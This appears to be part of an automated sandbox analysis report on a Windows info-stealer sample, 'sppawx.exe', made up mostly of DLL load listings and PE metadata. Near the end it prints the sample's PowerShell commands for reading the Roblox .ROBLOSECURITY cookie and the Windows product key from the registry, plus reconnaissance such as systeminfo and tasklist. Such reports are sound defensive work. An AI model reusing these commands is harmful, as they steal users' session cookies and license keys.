              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: sppawx.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: sppawx.exeStatic file information: File size 7834524 > 1048576
              Source: sppawx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: sppawx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: sppawx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: sppawx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: sppawx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: sppawx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: sppawx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: sppawx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: sppawx.exe, 00000002.00000002.1754174414.00007FFEDDF24000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: sppawx.exe, 00000002.00000002.1756530183.00007FFEED7A1000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.pdbhP source: powershell.exe, 00000044.00000002.1539735870.000001AF3CAE5000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: sppawx.exe, 00000002.00000002.1750819292.00007FFEDCBDF000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.pdb source: powershell.exe, 00000044.00000002.1539735870.000001AF3CAE5000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: sppawx.exe, 00000002.00000002.1756039277.00007FFEEAFC1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: sppawx.exe, 00000002.00000002.1755706204.00007FFEE6F27000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: sppawx.exe, 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: sppawx.exe, 00000002.00000002.1752922370.00007FFEDD7E2000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: sppawx.exe, 00000002.00000002.1755415210.00007FFEE44DC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: sppawx.exe, sppawx.exe, 00000002.00000002.1752922370.00007FFEDD7E2000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: sppawx.exe, 00000002.00000002.1756304635.00007FFEECEC1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: \vp.pdb* source: powershell.exe, 00000044.00000002.1603530749.000001AF5481E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: sppawx.exe, 00000002.00000002.1755415210.00007FFEE44DC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: sppawx.exe, 00000002.00000002.1755203682.00007FFEDE6A1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: sppawx.exe, 00000000.00000003.1294996044.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1757151271.00007FFEF5CF1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: sppawx.exe, 00000000.00000003.1294996044.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1757151271.00007FFEF5CF1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752661603.00007FFEDD411000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000000.1619209555.00007FF625720000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp
              Source: sppawx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: sppawx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: sppawx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: sppawx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: sppawx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
